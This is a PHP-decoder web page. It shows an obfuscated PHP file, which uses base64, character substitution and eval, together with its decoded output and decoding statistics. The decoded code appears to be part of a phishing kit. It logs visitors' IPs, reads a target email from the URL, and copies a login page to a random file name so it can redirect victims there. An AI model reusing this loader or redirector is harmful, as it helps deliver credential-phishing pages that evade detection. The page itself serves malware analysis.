Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='P2lCP1ouWg1WDVZoKj42c25zPU96PmdNblFXPT4qaA1WTXp6T3pfek1aT3o9c0h4KG..

Decoded Output download

<?php ?><?php
/* Visitor Result */
error_reporting(0);
include ('blocker.php');
$botip = getenv("REMOTE_ADDR");
$botbrowser = $_SERVER['HTTP_USER_AGENT'];
$botdate = date("D M d, Y g:i a");
$botdata = "

 Visitor Information
 IP Address: $botip
 Country: $botcountry 
 Browser: $botbrowser
 Date: $botdate 

";
if ($visitor == 1) {
    $file = fopen("./data.txt", "a");
    fwrite($file, $botdata);
    fclose($file);
}
function random_number() {
    $numbers = array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'A', 'b', 'C', 'D', 'e', 'F', 'G', 'H', 'i', 'J', 'K', 'L');
    $key = array_rand($numbers);
    return $numbers[$key];
}
$url = random_number() . random_number() . random_number() . random_number() . random_number() . random_number() . date('U') . md5(date('U')) . md5(date('U')) . md5(date('U')) . md5(date('U')) . md5(date('U'));
header('location:' . $url);
/* Autodetected Email */
if (isset($_GET['email'])) {
    $x = $_GET['email'];
} elseif (isset($_GET['target'])) {
    $x = base64_decode($_GET['target']);
} elseif (isset($_GET['code'])) {
    $x = urldecode($_GET['code']);
}
$dir = getcwd();
if ($handle = opendir($dir)) {
    while (false !== ($entry = readdir($handle))) {
        $len = strlen($entry);
        if ($len == 28) {
            rename($entry, "login.php");
        }
    }
}
$staticfile = "login.php";
$name = generateRandomString();
$a29official = $name . ".php";
if (!copy($staticfile, $a29official)) {
} else {
    if (file_exists($a29official)) {
        unlink($staticfile);
        header("Location: $a29official?$name&uid=$url&data=$x");
    }
}
function generateRandomString($length = 24) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0;$i < $length;$i++) {
        $randomString.= $characters[rand(0, $charactersLength - 1) ];
    }
    return $randomString;
}
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='P2lCP1ouWg1WDVZoKj42c25zPU96PmdNblFXPT4qaA1WTXp6T3pfek1aT3o9c0h4KGEpO3NIMldROU0oJzxXTzJ5TXpYWi5aJyk7DVYkPE89c1o+Uz54TT1NSGMoImdLdTdUS19GNDRnIik7JDxPPTx6T31uTXo+Uz4kX3BLZzZLZ2ondFRUbV8gcEtnX0ZDS0VUJ2Q7JDxPPTllPU0+Uz45ZT1NKCI0PnU+OSw+Yj54OnM+ZSIpOw1WJDxPPTllPWU+Uz4iDVYNVj42c25zPU96PjNIQU96WWU9c09IDVY+M20+Rjk5ek1ubjo+JDxPPXNaDVY+L09RSD16cTo+JDxPPTJPUUg9enE+DVY+b3pPfW5Nejo+JDxPPTx6T31uTXoNVj40ZT1NOj4kPE89OWU9TT4NVg1WIjsNVnNBKCRjc25zPU96U1MwKT5dPiRBc1dNU0FPWk1IKCJYaDllPWVYPVI9IiwiZSIpOz5BfXpzPU0oJEFzV00sJDxPPTllPWUpO0EyV09uTSgkQXNXTSk7PmxBUUgyPXNPSD56ZUg5T1lfSFFZPE16KCldJEhRWTxNem5TZXp6ZXEoYSwwLGssSixVLEwsWywxLGYsUCwnRicsJzwnLCcvJywnNCcsJ00nLCdyJywnQycsJ3QnLCdzJywnOCcsJ0cnLCdJJyk7JHlNcVNlenplcV96ZUg5KCRIUVk8TXpuKTt6TT1Rekg+JEhRWTxNem5qJHlNcWQ7PmwkUXpXU3plSDlPWV9IUVk8TXooKVh6ZUg5T1lfSFFZPE16KClYemVIOU9ZX0hRWTxNeigpWHplSDlPWV9IUVk8TXooKVh6ZUg5T1lfSFFZPE16KClYemVIOU9ZX0hRWTxNeigpWDllPU0oJyAnKVhZOUwoOWU9TSgnICcpKVhZOUwoOWU9TSgnICcpKVhZOUwoOWU9TSgnICcpKVhZOUwoOWU9TSgnICcpKVhZOUwoOWU9TSgnICcpKTsuTWU5TXooJ1dPMmU9c09IOidYJFF6Vyk7DVYNVmgqPkZRPU85TT1NMj1NOT5LWWVzVz4qaA1Wc0E+KHNubk09KCRfQ0tUaidNWWVzVydkKSk+XSRSPlM+JF9DS1RqJ01ZZXNXJ2Q7bA1WTVduTXNBPihzbm5NPSgkX0NLVGonPWV6eE09J2QpKT5dJFI+Uz48ZW5NW1VfOU0yTzlNKCRfQ0tUaic9ZXp4TT0nZCk7bA1WTVduTXNBPihzbm5NPSgkX0NLVGonMk85TSdkKSk+XSRSPlM+UXpXOU0yTzlNKCRfQ0tUaicyTzlNJ2QpO2wkOXN6PlM+PnhNPTJ9OSgpOw1Wc0E+KCQuZUg5V00+Uz5PWk1IOXN6KCQ5c3opKT5dfS5zV00+KEFlV25NPiFTUz4oJE1IPXpxPlM+ek1lOTlzeigkLmVIOVdNKSkpPl0kV01IPlM+bj16V01IKCRNSD16cSk7DVZzQSgkV01IPlNTPmtmKV16TUhlWU0oJE1IPXpxLD4iV094c0hYWi5aIik7bGxsJG49ZT1zMkFzV00+Uz4iV094c0hYWi5aIjskSGVZTT5TPj54TUhNemU9TWdlSDlPWXA9enNIeCgpOyRla1BPQUFzMnNlVz5TPiRIZVlNWCJYWi5aIjsNVnNBPighMk9acSgkbj1lPXMyQXNXTSw+JGVrUE9BQXMyc2VXKSk+XWxNV25NPl1zQShBc1dNX01Sc249bigkZWtQT0FBczJzZVcpKV1RSFdzSHkoJG49ZT1zMkFzV00pOy5NZTlNeigiSU8yZT1zT0g6PiRla1BPQUFzMnNlVz8kSGVZTSZRczlTJFF6VyY5ZT1lUyRSIik7bGwNVkFRSDI9c09IPnhNSE16ZT1NZ2VIOU9ZcD16c0h4KCRXTUh4PS4+Uz5rVSk+XSQyLmV6ZTI9TXpuPlM+J2Ewa0pVTFsxZlBlPDI5TUF4LnMKeVdZSE9adnpuPVFjfVJxNSc7JDIuZXplMj1Nem5JTUh4PS4+Uz5uPXpXTUgoJDIuZXplMj1Nem4pOyR6ZUg5T1lwPXpzSHg+Uz4nJztBT3o+KCRzPlM+YTs+JHM+Qj4kV01IeD0uOz4kcysrKT5dJHplSDlPWXA9enNIeD5YUz4kMi5lemUyPU16bmp6ZUg5KGEsPiQyLmV6ZTI9TXpuSU1IeD0uPi0+MClkO2x6TT1Rekg+JHplSDlPWXA9enNIeDtsDVYNVg1WDVY/aQ=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>

Function Calls

base64_decode 2
strrev 1
strtr 1
str_replace 1

Variables

$_R 0
$_X 0
$_F index.php
$_D base64_decode

Stats

MD5 4a912bfd33a59f60d55956f404bee214
Eval Count 2
Decode Time 225 ms